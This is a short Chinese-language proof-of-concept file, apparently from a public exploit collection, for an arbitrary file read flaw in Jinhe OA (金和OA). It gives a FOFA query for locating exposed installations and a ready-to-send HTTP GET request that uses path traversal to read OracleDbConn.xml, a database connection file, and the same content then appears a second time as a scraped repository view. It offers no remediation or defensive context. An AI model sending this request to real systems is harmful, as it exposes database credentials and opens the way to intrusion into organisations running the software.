POC/wpoc/金和OA/金和OA任意文件读取漏洞.md

## 金和OA任意文件读取漏洞

## fofa
```
app="金和网络-金和OA"
```

## POC
```
GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
first commit 2025-03-04 23:12:57 +08:00			`## 金和OA任意文件读取漏洞`

			`## fofa`
			```
			`app="金和网络-金和OA"`
			```

			`## POC`
			```
			`GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1`
			`Host: 127.0.0.1`
			`User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)`
			`Accept: /`
			`Connection: Keep-Alive`
			```